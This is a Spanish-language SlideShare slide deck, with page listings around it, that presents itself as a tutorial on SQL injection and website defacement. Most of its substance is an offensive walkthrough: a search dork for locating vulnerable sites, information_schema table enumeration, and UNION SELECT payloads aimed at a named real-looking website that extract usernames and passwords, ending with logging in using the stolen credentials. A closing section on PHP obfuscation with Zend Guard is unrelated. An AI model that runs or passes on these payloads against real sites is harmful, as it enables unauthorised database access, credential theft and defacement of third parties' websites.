SlideShare una empresa de Scribd logo
SQL Injection
¿Que es SQL Injection?Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.
¿Que es Deface?El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.También por passwordsdebiles, problemas en el FTP, etc.
Pasos: Buscando website vulnerable.Bueno, ahora vamos a buscar una website vulnerable, para saber si es vulnerable a sqlinjection, en la url tiene que haber algo como; ?id=NUMERO o algo parecido, siempre tiene que haber un "="Para eso buscamos en el explorador: allinurl: "info_page.php?id=*“ para encontrar las websites que tiene esa falla.
Sql Injection
Sql Injection
Sql Injection
Sql Injection
se agrega "+from+information_schema.tables--" y se sustituye un valor de los arrojados por table_namese quita el - - y se agrega "+limit+1,1--"jugando con los numeros “2,1”,  ”3,1”,etc para obtener nombres de tablasHasta que encontramos la tabla que contiene el “nombre de usuario”!!Ahora ya tenemos la tabla: USER_PRIVILEGES  lo que haremos ahora es lo siguiente:Borramos information_schema.tables+limit+15,1-- y agregamos lo sig:http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+0,”name”,2,3,4+from+USER_PRIVILEGESAVISO: No siempre es nombre, aveces si no funciona tienes que poner, admin,login,root,adm,administrador,etc.
Ahora como ya sabes el username, borramos lo que hay entre el 0 y el 2.  Y ponemos para obtener la clave:concat(nombre,0x3a3a,pass).http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+concat(nombre,0x3a3a,pass),”name”,concat(nombre,0x3a3a,pass),3,4+from+USER_PRIVILEGESSi no te funciona, cambia donde pone pass[concat(nombre,0x3a3a,pass) por clave,password,contraseña.
OBTENIENDO LA CLAVE!! YA PODEMOS LOGEARNOS
OFUSCAR CODIGO EN PHP:Cuando el desarrollador sustenta su economía a través de la venta de sus productos -diseñados por él o por su empresa-, el que el cliente disponga del código y pueda ofrecerlo a terceros puede ocasionar, entre otras, un aumento del precio final del producto, para evitar los denominados daños colaterales.
¿Cómo evitar esto?La respuesta está en ofuscar el código PHP. A través de la ofuscación del código PHP, el cliente podrá disponer siempre de la aplicación a un precio inferior y el desarrollador estará libre de pesadillas.En el mercado existen varias alternativas para ofuscar código PHP. Una de ellas, y la que más me convence, viene de la mano de ZEND, ZEND GUARD.
Sql Injection
Sql Injection
Sql Injection
Sql Injection
Sql Injection

Más contenido relacionado

PDF
Eliminando SQL injection
DOCX
Errores que generan los sql con la solucion
PPTX
Los atacantes y sus herramientas
PPTX
Tuto keepass
PPTX
Como borrar archivos temporales
PDF
Millonario tutorial
ODT
Ud06 e04 comandos ms-dos
PPTX
Uso del comando ECHO (Practica 5)
Eliminando SQL injection
Errores que generan los sql con la solucion
Los atacantes y sus herramientas
Tuto keepass
Como borrar archivos temporales
Millonario tutorial
Ud06 e04 comandos ms-dos
Uso del comando ECHO (Practica 5)

Similar a Sql Injection (20)

PDF
Inyección_sql
PPTX
Inyecciones SQL
PPT
Inyeccion sql
PDF
Vulnerabilidades en aplicaciones web
PDF
Seguridad WEB - Principios básicos.
DOCX
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
PPTX
Inyecciones SQL para Aprendices
DOCX
Inyeccion sql by Anonymous - Americalatina
ODP
Seguridad en PHP (es)
PDF
Ataques de inyección SQL: qué son y cómo protegerse
PDF
Presentación Workshop php Barcelona Seguridad
PDF
Seguridad en servidores WEB. Modulo mod_security
PDF
Inyecciones sql para todos
PPT
Seguridad En Programación
PPT
INYECCION SQL(SEGURIDAD DE LA INFORMACION)
PPTX
Inyeccionessqlparaaprendices complemento clase 1
PPTX
Inyecciones sql para aprendices
ODP
Vulnerabilidades del Software
ODP
Seguridad en aplicaciones web
ODP
Curso basicoseguridadweb slideshare3
Inyección_sql
Inyecciones SQL
Inyeccion sql
Vulnerabilidades en aplicaciones web
Seguridad WEB - Principios básicos.
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Inyecciones SQL para Aprendices
Inyeccion sql by Anonymous - Americalatina
Seguridad en PHP (es)
Ataques de inyección SQL: qué son y cómo protegerse
Presentación Workshop php Barcelona Seguridad
Seguridad en servidores WEB. Modulo mod_security
Inyecciones sql para todos
Seguridad En Programación
INYECCION SQL(SEGURIDAD DE LA INFORMACION)
Inyeccionessqlparaaprendices complemento clase 1
Inyecciones sql para aprendices
Vulnerabilidades del Software
Seguridad en aplicaciones web
Curso basicoseguridadweb slideshare3
Publicidad

Último (20)

PDF
Híper Mega Repaso Histológico Bloque 3.pdf
PDF
Guia de Tesis y Proyectos de Investigacion FS4 Ccesa007.pdf
PDF
Educación Artística y Desarrollo Humano - Howard Gardner Ccesa007.pdf
PDF
Didactica de la Investigacion Educativa SUE Ccesa007.pdf
PDF
Unidad de Aprendizaje 5 de Matematica 1ro Secundaria Ccesa007.pdf
PDF
ciencias-1.pdf libro cuarto basico niños
PDF
biología es un libro sobre casi todo el tema de biología
PDF
COMPLETO__PROYECTO_VIVAN LOS NIÑOS Y SUS DERECHOS_EDUCADORASSOS.pdf
PDF
Escuela Sabática 6. A través del Mar Rojo.pdf
PDF
PFB-MANUAL-PRUEBA-FUNCIONES-BASICAS-pdf.pdf
DOCX
V UNIDAD - PRIMER GRADO. del mes de agosto
PDF
IDH_Guatemala_2.pdfnjjjkeioooe ,l dkdldp ekooe
PDF
Gasista de unidades unifuncionales - pagina 23 en adelante.pdf
PDF
La Evaluacion Formativa en Nuevos Escenarios de Aprendizaje UGEL03 Ccesa007.pdf
PDF
Crear o Morir - Andres Oppenheimer Ccesa007.pdf
PDF
Metodologías Activas con herramientas IAG
PDF
SESION 12 INMUNIZACIONES - CADENA DE FRÍO- SALUD FAMILIAR - PUEBLOS INDIGENAS...
PDF
Cronograma de clases de Práctica Profesional 2 2025 UDE.pdf
PDF
Integrando la Inteligencia Artificial Generativa (IAG) en el Aula
PDF
GUIA DE: CANVA + INTELIGENCIA ARTIFICIAL
Híper Mega Repaso Histológico Bloque 3.pdf
Guia de Tesis y Proyectos de Investigacion FS4 Ccesa007.pdf
Educación Artística y Desarrollo Humano - Howard Gardner Ccesa007.pdf
Didactica de la Investigacion Educativa SUE Ccesa007.pdf
Unidad de Aprendizaje 5 de Matematica 1ro Secundaria Ccesa007.pdf
ciencias-1.pdf libro cuarto basico niños
biología es un libro sobre casi todo el tema de biología
COMPLETO__PROYECTO_VIVAN LOS NIÑOS Y SUS DERECHOS_EDUCADORASSOS.pdf
Escuela Sabática 6. A través del Mar Rojo.pdf
PFB-MANUAL-PRUEBA-FUNCIONES-BASICAS-pdf.pdf
V UNIDAD - PRIMER GRADO. del mes de agosto
IDH_Guatemala_2.pdfnjjjkeioooe ,l dkdldp ekooe
Gasista de unidades unifuncionales - pagina 23 en adelante.pdf
La Evaluacion Formativa en Nuevos Escenarios de Aprendizaje UGEL03 Ccesa007.pdf
Crear o Morir - Andres Oppenheimer Ccesa007.pdf
Metodologías Activas con herramientas IAG
SESION 12 INMUNIZACIONES - CADENA DE FRÍO- SALUD FAMILIAR - PUEBLOS INDIGENAS...
Cronograma de clases de Práctica Profesional 2 2025 UDE.pdf
Integrando la Inteligencia Artificial Generativa (IAG) en el Aula
GUIA DE: CANVA + INTELIGENCIA ARTIFICIAL
Publicidad

Sql Injection

  • 2. ¿Que es SQL Injection?Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.
  • 3. ¿Que es Deface?El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.También por passwordsdebiles, problemas en el FTP, etc.
  • 4. Pasos: Buscando website vulnerable.Bueno, ahora vamos a buscar una website vulnerable, para saber si es vulnerable a sqlinjection, en la url tiene que haber algo como; ?id=NUMERO o algo parecido, siempre tiene que haber un "="Para eso buscamos en el explorador: allinurl: "info_page.php?id=*“ para encontrar las websites que tiene esa falla.
  • 9. se agrega "+from+information_schema.tables--" y se sustituye un valor de los arrojados por table_namese quita el - - y se agrega "+limit+1,1--"jugando con los numeros “2,1”, ”3,1”,etc para obtener nombres de tablasHasta que encontramos la tabla que contiene el “nombre de usuario”!!Ahora ya tenemos la tabla: USER_PRIVILEGES lo que haremos ahora es lo siguiente:Borramos information_schema.tables+limit+15,1-- y agregamos lo sig:http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+0,”name”,2,3,4+from+USER_PRIVILEGESAVISO: No siempre es nombre, aveces si no funciona tienes que poner, admin,login,root,adm,administrador,etc.
  • 10. Ahora como ya sabes el username, borramos lo que hay entre el 0 y el 2. Y ponemos para obtener la clave:concat(nombre,0x3a3a,pass).http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+concat(nombre,0x3a3a,pass),”name”,concat(nombre,0x3a3a,pass),3,4+from+USER_PRIVILEGESSi no te funciona, cambia donde pone pass[concat(nombre,0x3a3a,pass) por clave,password,contraseña.
  • 11. OBTENIENDO LA CLAVE!! YA PODEMOS LOGEARNOS
  • 12. OFUSCAR CODIGO EN PHP:Cuando el desarrollador sustenta su economía a través de la venta de sus productos -diseñados por él o por su empresa-, el que el cliente disponga del código y pueda ofrecerlo a terceros puede ocasionar, entre otras, un aumento del precio final del producto, para evitar los denominados daños colaterales.
  • 13. ¿Cómo evitar esto?La respuesta está en ofuscar el código PHP. A través de la ofuscación del código PHP, el cliente podrá disponer siempre de la aplicación a un precio inferior y el desarrollador estará libre de pesadillas.En el mercado existen varias alternativas para ofuscar código PHP. Una de ellas, y la que más me convence, viene de la mano de ZEND, ZEND GUARD.